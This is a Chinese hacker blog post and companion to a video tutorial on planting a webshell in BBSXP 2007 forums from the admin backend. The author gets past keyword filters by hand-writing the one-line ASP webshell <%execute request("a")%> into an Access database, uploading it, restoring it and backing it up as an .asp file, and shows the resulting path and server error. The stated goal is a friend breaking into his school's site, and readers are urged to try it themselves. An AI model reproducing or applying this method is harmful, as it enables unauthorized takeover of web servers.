录制工具有点问题 ! 打开等10秒就好 !
-----------------------------
⿺微笑こ刺客's Blog !
http://www.ckhacker.cn/blog/
-----------------------------
最近bbsxp暴出N多注入! 又一兄弟说要把他学校站日了! 管理员已经拿到 !
其实bbsxp最近出的洞拿个管理员也是简单的! 但是问题是进后台了如何拿shell !
很多人都说不行 ! 没价值 ! 于是我就帮他看了下 !
先感谢兄弟: 黑客VS英雄 提供空间搭建bbsxp. KonBlueSky 一起分析研究 !
本来都说准备等几天说的可是我看sobiny大叔发出来了! 原理和他相同 !
关于sobiny发表的详情见http://sobiny.cn/article.asp?id=33.
先说下测试环境和参数: Microsoft-IIS/6.0 , VBs cript/5.6.8832 ,BBSXP 2007 ACCESS 7.3.070707.
原理: 利用恢复数据库恢复含马数据库恢复成功然后备份成ASP!
我们知道! BBSXP他过滤关键字符,我们在发帖的时候他过滤掉了很多关键符号.
我们写的一句话写上去根本就没用了 ! 但是在后台 管理所有角色 可以添加一句话 ! 但是是无法执行的区段!
KonBlueSky说测试成功了! 但是我试了下! 写入成功,无法执行 !
那么我想到了个思路! 把数据库下载下来然后手动往库里写入一句话 !
然后上传,再恢复数据库,再备份ASP ! 实验了下 ! 成功 !
修改数据库的小工具TinyMDBEditor1.00 !
OK ! 看操作 ! 我就不打字了 !
没成功 !
<br /><%execute request("a")%> 过滤掉了饿 !
手动写入 !
<%execute request("a")%>
有点卡!
UpFile/UpAttachment/2007-8/20078231534.mdb
Microsoft VBs cript 运行时错误 错误 '800a000d'
类型不匹配: 'execute'
/bbsxp/database/a.asp,行 2379
成功了! 我门连上去试试 !
OK ! 成功了 ! 大家也可以试试 ! 思路很重要 !
教程就到这里结素了吧 !
设为首页
加入收藏
发布作品
栏目导航
bbsxp后台拿SHELL
